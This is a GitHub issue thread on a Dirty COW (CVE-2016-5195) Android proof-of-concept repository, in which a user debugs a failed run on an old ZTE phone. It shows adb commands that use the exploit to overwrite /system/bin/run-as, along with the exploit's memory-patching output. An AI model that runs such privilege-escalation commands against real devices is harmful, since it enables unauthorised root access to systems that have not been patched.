timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Problem on Android 2.2.2 #33

Closed z3ntu closed 7 years ago

z3ntu commented 8 years ago

$ make run
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
[1] Segmentation fault /data/local/tmp/...
adb shell /system/bin/run-as
Usage: run-as <package-name> <command> [<args>]

Device is a ZTE Racer II with Android 2.2.2. Wikipedia link: https://en.wikipedia.org/wiki/ZTE_Racer_II

I think that the shell is a problem, as it's extremely bad (arrow-up doesn't work and everything else is also bad).

Running the command in a shell manually:

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
[1] + Stopped (signal) /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
$ # i pressed enter here
[1] Segmentation fault /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as

timwr commented 7 years ago

Can you try this branch please? https://github.com/timwr/CVE-2016-5195/tree/oldcow

z3ntu commented 7 years ago

I don't get a segmentation fault anymore but it still doesn't quite work.

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
warning: new file size (9680) and file old size (76136) differ

size 76136

[*] mmap 0x40030000
[*] exploit (patch)
[*] currently 0x40030000=464c457f
[*] madvise = 0x40030000 76136
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x40030000=464c457f
$ run-as
Usage: run-as <package-name> <command> [<args>]

$ run-as id
run-as: Package 'id' is unknown

timwr commented 7 years ago

I suspect your device isn't vulnerable. Can you try make test?